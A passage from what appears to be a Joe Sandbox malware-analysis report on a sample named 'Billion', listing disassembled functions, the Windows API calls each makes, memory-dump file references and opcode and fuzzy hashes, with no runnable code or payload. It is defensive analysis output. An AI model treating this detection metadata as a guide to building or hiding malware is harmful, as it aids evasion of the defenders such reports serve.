                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00202418,?,?,?,?,?,?,?,00133368,?), ref: 001334BB
                                                                                                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00133377
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 974372a5d4405a27593e392637119e38cbafb0e33837ee5edf326ea086028a7d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9e84c6cd60ef526a007ab6118e35f40c877633fa49b265c6a37068e8326ea59f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 974372a5d4405a27593e392637119e38cbafb0e33837ee5edf326ea086028a7d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25F05E31558744EFD701AF60FC0EB243BA8B71471AF00885BBA198A0E3DBBA81988B44
                                                                                                                                                                                                                                                                                                          Function 0014F950 Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM ref: 0014F96C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013EE30: GetInputState.USER32 ref: 0013EF07
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 0018FB22
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InputSleepStateTimetime
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4149333218-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 721ee1e4c0a05618731e76375e4556e9cd85e841e8dfa32be1caa30037c2a52a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 995cc47ac445d417da84e7716079d7898d4080a861c0455606f25416a372401d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 721ee1e4c0a05618731e76375e4556e9cd85e841e8dfa32be1caa30037c2a52a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85F058322003069FC314AF69D415F66FBE9AB54765F024039F81AC73A0DB70A800CB90
                                                                                                                                                                                                                                                                                                          Function 001B7AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LoadString
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c94ec6b198d97bdc12ac1825d52d093868f44cec60b8cd6a91d3fc32d4f4b9a7
                                                                                                                                                                                                                                                                                                          • Instruction ID: b078a44b88a7efbce28e0fb156f04cbb6b2809c2abc5efd76dd817b1c4337d3f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c94ec6b198d97bdc12ac1825d52d093868f44cec60b8cd6a91d3fc32d4f4b9a7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7D13B75A0420AEFCF14EF98D8819EDBBB5FF58310F144159E915AB291EB30AE81CF90
                                                                                                                                                                                                                                                                                                          Function 0015F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: dce337649d865451b65f78f12b8ad9564c043c06a86b29e4facf2ce2657d9c74
                                                                                                                                                                                                                                                                                                          • Instruction ID: aa81c509ba9add9715d6316fb393ecddef2a71610f3cf2a5047a4826e3c2478f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dce337649d865451b65f78f12b8ad9564c043c06a86b29e4facf2ce2657d9c74
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8251C675A00208EFDB14DF68C844AA97BE2EB85365F19816CEC299F392D731ED47CB50
                                                                                                                                                                                                                                                                                                          Function 0019FCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 0019FCCE
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: b2fffb17f1b570285f0edf5b28d4d9c8a75d3f90e8f3c948983948c7765ecdd1
                                                                                                                                                                                                                                                                                                          • Instruction ID: 59a8fc6b6f03a5ca27eb314ccaf86d2ff51c30df955e375f4b7895b650ce230e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2fffb17f1b570285f0edf5b28d4d9c8a75d3f90e8f3c948983948c7765ecdd1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB419376500209AFCF15DFA8C8819AEB7F8EF58314B21853EE916DB251EB70DE06CB50
                                                                                                                                                                                                                                                                                                          Function 00136679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0013668B,?,?,001362FA,?,00000001,?,?,00000000), ref: 0013664A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0013665C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013663E: FreeLibrary.KERNEL32(00000000,?,?,0013668B,?,?,001362FA,?,00000001,?,?,00000000), ref: 0013666E
                                                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,001362FA,?,00000001,?,?,00000000), ref: 001366AB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00136607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00175657,?,?,001362FA,?,00000001,?,?,00000000), ref: 00136610
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00136607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00136622
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00136607: FreeLibrary.KERNEL32(00000000,?,?,00175657,?,?,001362FA,?,00000001,?,?,00000000), ref: 00136635
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ca4e66afdcf9f42fa7715beb77d5c94990faa801624bd3f690f0495ac9bed08e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2c23ba70ce87d19f80b7a685a19a447caf391646718a23e0531c557de1a09f0a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca4e66afdcf9f42fa7715beb77d5c94990faa801624bd3f690f0495ac9bed08e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6711E7B1600305BACF14AB20CD07BADBBA59F60755F20C42DF456AA1C2DFB1DA059B50
                                                                                                                                                                                                                                                                                                          Function 00168782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3b6c040ed3dd9c8744854002ee33e92ddb27f03fcc8c7e5abd28e0e5d14c732e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2ebb3d3d0311e4749c0261623384b8e09ab76e66d22a5d6e9df9556a467d9510
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b6c040ed3dd9c8744854002ee33e92ddb27f03fcc8c7e5abd28e0e5d14c732e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9611187590420AAFCB15DF98E94599A7BF8EF48310F114169F809AB311DB31EE21CB65
                                                                                                                                                                                                                                                                                                          Function 00165373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00164FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0016319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00165031
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 001653DF
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 614378929-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 97f57b9e0be4db311a63f3fdf227c41e1551cb87f9ff9d800c955b245aceba3d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9701F9736007056BE3318F69DC8195AFBEDFB85370F65061DE59483280EB70A905C774
                                                                                                                                                                                                                                                                                                          Function 0015E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 31c1a439cddd47d98a8f0e12b7ba8f377c2423b5a10fd66589acfd294ac55607
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BF02D32901A10D6D7353A6ADC0575A33D98F5233AF110716FC35DB1D1DF70D91A86D2
                                                                                                                                                                                                                                                                                                          Function 0013B329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 176396367-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 604ebb882747aa44eaa7c4f2dad2a36e43ae16ac027461114254cb873ac85486
                                                                                                                                                                                                                                                                                                          • Instruction ID: 107411009f4df2eb8b4b635992a2aa2c0f35938fe703d6585aa8baa03ec4dfa5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 604ebb882747aa44eaa7c4f2dad2a36e43ae16ac027461114254cb873ac85486
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9F0C8B3601B14BED7159F38D846B66BB98EB54360F10812AFA29CF1D1EB31E5148BA0
                                                                                                                                                                                                                                                                                                          Function 001AF94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 001AF987
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 76aa49118bf3ecb488a7c3dfc75f101329c479af427c1880504642da48eb9048
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1e9c99e343332a008b0ed44457dc08cd866d9d576b8c66c2b7e5ab3c9587820f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76aa49118bf3ecb488a7c3dfc75f101329c479af427c1880504642da48eb9048
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CF04F76600204BFCB01EBA5DC46D9FBBB8EF69720F004065F905AB261DB70EE45C761
                                                                                                                                                                                                                                                                                                          Function 00164FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0016319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00165031
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7f3afe2e6f137b16872574b42e518c4e7ef26f72bb14d6183501d456b7e9c535
                                                                                                                                                                                                                                                                                                          • Instruction ID: 11f15fd33f63815cad1f1aa293b942199c5054454bc897d9334765a6d5a053ec
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f3afe2e6f137b16872574b42e518c4e7ef26f72bb14d6183501d456b7e9c535
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CAF0E236611E21E7DB352B66DC05F5B3B5BAF507E0F1A8022FC189B091DB30D82586E0
                                                                                                                                                                                                                                                                                                          Function 00163B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,00156A79,?,0000015D,?,?,?,?,001585B0,000000FF,00000000,?,?), ref: 00163BC5
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: dae79fd4dbeb276d774f0657ef8640e9278931b6b5c47114c3c065daec63be06
